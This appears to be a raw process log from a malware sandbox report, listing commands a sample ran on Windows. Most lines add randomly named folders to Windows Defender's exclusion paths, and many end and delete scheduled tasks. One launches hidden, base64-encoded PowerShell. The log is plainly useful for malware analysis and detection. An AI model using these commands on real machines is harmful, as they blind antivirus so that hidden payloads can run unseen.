- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nnhhQsOdXIjmP"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nnhhQsOdXIjmP2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nnhhQsOdXIjmP2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "dVwDiwRYVVWZv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dVwDiwRYVVWZv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "dVwDiwRYVVWZv2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dVwDiwRYVVWZv2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LfkgMigEKkJvI"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LfkgMigEKkJvI2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BHgVOCrLEaPLWX"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LfkgMigEKkJvI2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rSyUoEsYgMQNdWsXOtW2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rSyUoEsYgMQNdWsXOtW2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rSyUoEsYgMQNdWsXOtW"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kzdHAnWxKxUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR" /t REG_DWORD /d 0 /reg:32
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\kwXcNbfqpcqAgDVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\kwXcNbfqpcqAgDVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\kwXcNbfqpcqAgDVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\kwXcNbfqpcqAgDVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\UPPIBGlQjiGyE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\UPPIBGlQjiGyE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\UPPIBGlQjiGyE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\UPPIBGlQjiGyE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\WEexobxRFxDZXHoxB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\WEexobxRFxDZXHoxB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\WEexobxRFxDZXHoxB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\WEexobxRFxDZXHoxB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ODsEVyADpkYpEThoh"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ODsEVyADpkYpEThoh"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ODsEVyADpkYpEThoh2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ODsEVyADpkYpEThoh2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nDalXvzpFxMtxtHQe"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nDalXvzpFxMtxtHQe"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kzdHAnWxKxUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nDalXvzpFxMtxtHQe2"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kzdHAnWxKxUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ZPnqDDJvVIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "gYUxXehbw"
- '<SYSTEM32>\taskeng.exe' {11AFEDF7-8F6E-4288-9578-A194F1A05E59} S-1-5-21-1960123792-2022915161-3775307078-1001:icxxolrftg\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gYUxXehbw"
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C copy nul "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab\nuvAlEJFODhFCvHo.vbs"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\EpcEJPhsU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\EpcEJPhsU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\EpcEJPhsU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\EpcEJPhsU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\JqemkQhrUPhMC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\JqemkQhrUPhMC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\JqemkQhrUPhMC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\JqemkQhrUPhMC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TaJoPAkogKnU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TaJoPAkogKnU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TaJoPAkogKnU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TaJoPAkogKnU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ZPnqDDJvVIE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ZPnqDDJvVIE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ZPnqDDJvVIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nDalXvzpFxMtxtHQe2"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kzdHAnWxKxUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KrnVPtjsmAdhAVRxq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nVCovLHcbqwzsiMEu"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nVCovLHcbqwzsiMEu2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nVCovLHcbqwzsiMEu2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qTJJWduVsPaspcAAyaN"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qTJJWduVsPaspcAAyaN"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qTJJWduVsPaspcAAyaN2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qTJJWduVsPaspcAAyaN2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ORSdivNszjhcgoEOZiv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ORSdivNszjhcgoEOZiv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ORSdivNszjhcgoEOZiv2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ORSdivNszjhcgoEOZiv2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "xNjZsYPiSGLjFzLezwa"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "xNjZsYPiSGLjFzLezwa"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "xNjZsYPiSGLjFzLezwa2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "xNjZsYPiSGLjFzLezwa2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KbrVKPKGYQjtMqltUBI"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KbrVKPKGYQjtMqltUBI"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KbrVKPKGYQjtMqltUBI2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KbrVKPKGYQjtMqltUBI2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HlraJrbZRTuSRRlvKLL"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HlraJrbZRTuSRRlvKLL"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HlraJrbZRTuSRRlvKLL2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HlraJrbZRTuSRRlvKLL2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "gGPHbShZtqiVcmbEZLC"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gGPHbShZtqiVcmbEZLC"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "gGPHbShZtqiVcmbEZLC2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gGPHbShZtqiVcmbEZLC2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rSyUoEsYgMQNdWsXOtW"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TrMdCebAqrUSXtuOI2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TrMdCebAqrUSXtuOI"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nVCovLHcbqwzsiMEu"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TrMdCebAqrUSXtuOI2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TrMdCebAqrUSXtuOI"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KrnVPtjsmAdhAVRxq"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KrnVPtjsmAdhAVRxq2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UsDSEqhNUiQnAZHyQ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UsDSEqhNUiQnAZHyQ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UsDSEqhNUiQnAZHyQ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UsDSEqhNUiQnAZHyQ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LQAiJcCEXyerbFRgQ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LQAiJcCEXyerbFRgQ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LQAiJcCEXyerbFRgQ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LQAiJcCEXyerbFRgQ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "tawdzWVUwEyVawTBP"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "tawdzWVUwEyVawTBP"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "tawdzWVUwEyVawTBP2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "tawdzWVUwEyVawTBP2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ELszhaopGfXJG2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BeAGdXVhhtWta"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sSNzQSjCyZyvAODCi"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sSNzQSjCyZyvAODCi2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "NnZKYAOUgYlswRzyY"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NnZKYAOUgYlswRzyY"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "NnZKYAOUgYlswRzyY2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NnZKYAOUgYlswRzyY2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UURJrwQXDqzVFyQJm"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UURJrwQXDqzVFyQJm"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UURJrwQXDqzVFyQJm2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UURJrwQXDqzVFyQJm2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BoUHmaGCzvexlIcry"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BoUHmaGCzvexlIcry"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BoUHmaGCzvexlIcry2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BoUHmaGCzvexlIcry2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KrnVPtjsmAdhAVRxq2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sSNzQSjCyZyvAODCi2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ELszhaopGfXJG2"